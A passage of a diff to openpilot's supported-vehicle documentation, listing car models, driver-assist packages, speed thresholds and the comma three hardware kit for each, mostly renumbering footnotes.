- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Lexus|UX Hybrid 2019-23|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Lincoln|Aviator 2020-21|Co-Pilot360 Plus|openpilot available[1](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Ford Q3 connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|MAN|eTGE 2020-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|MAN|TGE 2017-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|MAN|eTGE 2020-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|MAN|TGE 2017-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Mazda|CX-5 2022-23|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Mazda connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Mazda|CX-9 2021-23|All|Stock|0 mph|28 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Mazda connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Nissan|Altima 2019-20|ProPILOT Assist|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 Nissan B connector
- 1 RJ45 cable (7 ft)
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| @@ -163,26 +165,26 @@ A supported vehicle is one that just works when you install a comma three. All s |Nissan|Rogue 2018-20|ProPILOT Assist|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 Nissan A connector
- 1 RJ45 cable (7 ft)
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Nissan|X-Trail 2017|ProPILOT Assist|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 Nissan A connector
- 1 RJ45 cable (7 ft)
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Ram|1500 2019-23|Adaptive Cruise Control (ACC)|Stock|0 mph|32 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Ram connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|SEAT|Ateca 2018|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|SEAT|Leon 2014-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|Ascent 2019-21|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|Crosstrek 2018-19|EyeSight Driver Assistance|Stock|0 mph|0 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|Crosstrek 2020-23|EyeSight Driver Assistance|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|Forester 2019-21|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|Impreza 2017-19|EyeSight Driver Assistance|Stock|0 mph|0 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|Impreza 2020-22|EyeSight Driver Assistance|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|Legacy 2020-22|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru B connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|Outback 2020-22|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru B connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|XV 2018-19|EyeSight Driver Assistance|Stock|0 mph|0 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Subaru|XV 2020-21|EyeSight Driver Assistance|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Škoda|Fabia 2022-23[10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[12](#footnotes)|| -|Škoda|Kamiq 2021[8,10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[12](#footnotes)|| -|Škoda|Karoq 2019-21[10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Škoda|Kodiaq 2017-23[10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Škoda|Octavia 2015, 2018-19[10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Škoda|Octavia RS 2016[10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Škoda|Scala 2020[10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[12](#footnotes)|| -|Škoda|Superb 2015-22[10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|SEAT|Ateca 2018|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|SEAT|Leon 2014-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|Ascent 2019-21|All[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|Crosstrek 2018-19|EyeSight Driver Assistance[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|Crosstrek 2020-23|EyeSight Driver Assistance[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|Forester 2019-21|All[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|Impreza 2017-19|EyeSight Driver Assistance[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|Impreza 2020-22|EyeSight Driver Assistance[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|Legacy 2020-22|All[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru B connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|Outback 2020-22|All[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru B connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|XV 2018-19|EyeSight Driver Assistance[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Subaru|XV 2020-21|EyeSight Driver Assistance[7](#footnotes)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Subaru A connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Škoda|Fabia 2022-23[11](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[13](#footnotes)|| +|Škoda|Kamiq 2021[9,11](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[13](#footnotes)|| +|Škoda|Karoq 2019-21[11](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Škoda|Kodiaq 2017-23[11](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Škoda|Octavia 2015, 2018-19[11](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Škoda|Octavia RS 2016[11](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Škoda|Scala 2020-23[11](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[13](#footnotes)|| +|Škoda|Superb 2015-22[11](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|Alphard 2019-20|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|Alphard Hybrid 2021|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|Avalon 2016|Toyota Safety Sense P|openpilot available[2](#footnotes)|19 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| @@ -195,8 +197,8 @@ A supported vehicle is one that just works when you install a comma three. All s |Toyota|C-HR 2021|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|C-HR Hybrid 2017-20|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|C-HR Hybrid 2021-22|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Toyota|Camry 2018-20|All|Stock|0 mph[7](#footnotes)|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Toyota|Camry 2021-23|All|openpilot|0 mph[7](#footnotes)|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Toyota|Camry 2018-20|All|Stock|0 mph[8](#footnotes)|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Toyota|Camry 2021-23|All|openpilot|0 mph[8](#footnotes)|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|Camry Hybrid 2018-20|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|Camry Hybrid 2021-23|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|Corolla 2017-19|All|openpilot available[2](#footnotes)|19 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| @@ -226,41 +228,41 @@ A supported vehicle is one that just works when you install a comma three. All s |Toyota|RAV4 Hybrid 2019-21|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|RAV4 Hybrid 2022|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Toyota|Sienna 2018-20|All|openpilot available[2](#footnotes)|19 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Arteon 2018-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Arteon eHybrid 2020-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Arteon R 2020-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Atlas 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Atlas Cross Sport 2021-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|California 2021|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Caravelle 2020|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|CC 2018-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Crafter 2017-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
